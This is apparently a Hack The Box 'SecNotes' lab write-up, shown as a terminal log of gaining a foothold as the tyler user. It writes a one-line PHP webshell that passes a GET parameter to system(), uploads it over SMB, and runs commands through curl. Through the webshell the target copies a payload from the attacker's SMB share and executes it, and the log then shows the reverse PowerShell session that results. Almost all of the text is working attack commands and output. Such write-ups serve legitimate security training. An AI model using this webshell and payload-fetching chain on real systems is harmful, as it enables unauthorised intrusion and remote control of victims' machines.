Webshell
I am also able to gain a foothold on the target system as the tyler user through a webshell
More on this will be noted here. This page is execution only.
┌──(kali㉿kali)-[~/…/htb/labs/secnotes/ubuntu]
└─$ echo '<?php system($_GET['cmd']); ?>' > webshell.phpI will create a simple PHP webshell
smb: \> put webshell.php
putting file webshell.php as \webshell.php (0.3 kb/s) (average 0.3 kb/s)Uploading the PHP webshell to the web server running on the target port 8808 via SMB
┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ curl 'http://secnotes.htb:8808/webshell.php?cmd=whoami'
secnotes\tylerI can confirm the code command execution
┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ curl 'http://secnotes.htb:8808/webshell.php?cmd=copy+\\10.10.14.10\smb\64ps9998.exe+C:\tmp\64ps9998.exe'
1 file(s) copied.Uploading the same payload
┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ curl 'http://secnotes.htb:8808/webshell.php?cmd=C:\tmp\64ps9998.exe' Triggering the payload
┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.97] 50179
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) Microsoft Corporation. All rights reserved.
ps c:\inetpub\new-site> whoami
secnotes\tyler
ps c:\inetpub\new-site> hostname
SECNOTES
ps c:\inetpub\new-site> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::250
ipv6 address. . . . . . . . . . . : dead:beef::6832:cf76:958b:2105
temporary ipv6 address. . . . . . : dead:beef::2d54:dd95:22b0:d056
link-local ipv6 address . . . . . : fe80::6832:cf76:958b:2105%11
ipv4 address. . . . . . . . . . . : 10.10.10.97
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
10.10.10.2Initial Foothold Established to the target system as the tyler user through a webshell